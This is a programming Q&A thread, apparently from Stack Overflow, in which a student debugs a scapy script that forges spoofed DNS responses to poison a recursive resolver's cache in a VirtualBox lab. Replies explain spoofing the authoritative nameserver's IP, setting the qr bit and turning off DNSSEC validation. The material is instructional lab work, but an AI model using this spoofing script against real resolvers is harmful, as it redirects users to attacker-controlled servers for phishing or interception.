# DNS Cache poisoning in python

Tags: python-3.x, dns, wireshark, scapy

I'm trying to perform the attack descripted as  Dan's Shenanigans   [In this tutorial](http://unixwiz.net/techtips/iguide-kaminsky-dns-vuln.html)  on a vulnerable machine in virtual box, but the cache is not overwritten.

- The recursive server is at the address 192.168.56.20
- The attacker's machine is at 192.168.56.1
- The attacker's machine is also authoritative for the domain badguy.ru
- The recursive server uses a fixed port to make requests.

Looking at wireshark when I perform a request for the domain badguy.ru I receive on the attacker's machine these packets:
[image]
The details are the following:

The first one
[image: First one]

The second one

[image]

so in this case I saved in the variables

- sniffed_ip = 10.10.0.1
- sniffed_port=56488(not visible in the screenshots)
- query_id=0xe16c

I build the packets with scapy with adjacent the subsequent query/transaction ids in a range of 1000 packets, I make a fake request and finally I send the packets

```
packet_list = []
for i in range(args.range):
    pkt = (IP(src=sniffed_ip, dst='192.168.56.20')
           / UDP(sport=53, dport=sniffed_port)
           / DNS(id=query_id, 
                 an=None,
                 qr=1,
                 qd=DNSQR(qname='www123.bankofsteve.com', qtype="A"),
                 ns=(DNSRR(rrname='bankofsteve.com', type='NS', ttl=60000, rdata='ns.bankofsteve.com')),
                 ar=(DNSRR(rrname='ns.bankofsteve.com', type="A", ttl=60000, rdata='192.168.56.1'))))

    query_id=(query_id+1)%65536
    pkt.getlayer('DNS').id = query_id
    packet_list.append(pkt)

send(IP(dst='192.168.56.20') / UDP(dport=53) / DNS(rd=1, qd=DNSQR(qname='www123.bankofsteve.com')), verbose=0)
send(packet_list)
```

Packets arrive correctly to the recursive server but cache is not poisoned, I cannot understand where is the error, I think that it's not probably a valid response packet. Thanks in advance

Answer (score 2, accepted):

You're missing the core of the attack: you need to impersonate something that is credible (from the point of view of the server), not only catch the query ID and source port. In other words, the IP that you're using in the spoofed packet is wrong.

Also, there are two way to carry out this attack: poison the cache by injecting a single "faked" A record, or injecting a new NS record. Don't mess with these two.

Comment: Thank you for the reply, I also saw that I didn't set the qr bit. Probably you're right and I didn't fully understand how the attack works, how can I get the IP to spoof? What would be in that case?

Comment: As I said, you need to provide the answer as it is coming **from a legitimate server**.

During the DNS resolver procedure, the final step is to contact the **authoritative nameserver** for the domain `bankofsteve.com`. To discover which is the server, you can use `dig NS bankofsteve.com @<target-ip>`. There you'll have the IP address of an authoritative source of information (eg. the one you need to spoof).

Comment: Pretending I don't notice the haughtiness in your replies, I thank you for giving me something to work on. Maybe now the problem is clearer

Comment: I was just trying to say what you need to do without saying the ultimate solution, otherwise it's not helpful...

Answer (score 1):

If there is DNSSEC, one must validate the public key used to sign RRSEC.
If you try to hack your own DNS (configured by you, on linux for example) you can turn off the dnssec-validation in /etc/bind/named.conf.options.

Comment: Thank you very much, unfortunately that was not the problem. It seems that I had to get the ip with an NS query and I had to set the qr bit. Anyway thanks a lot for your help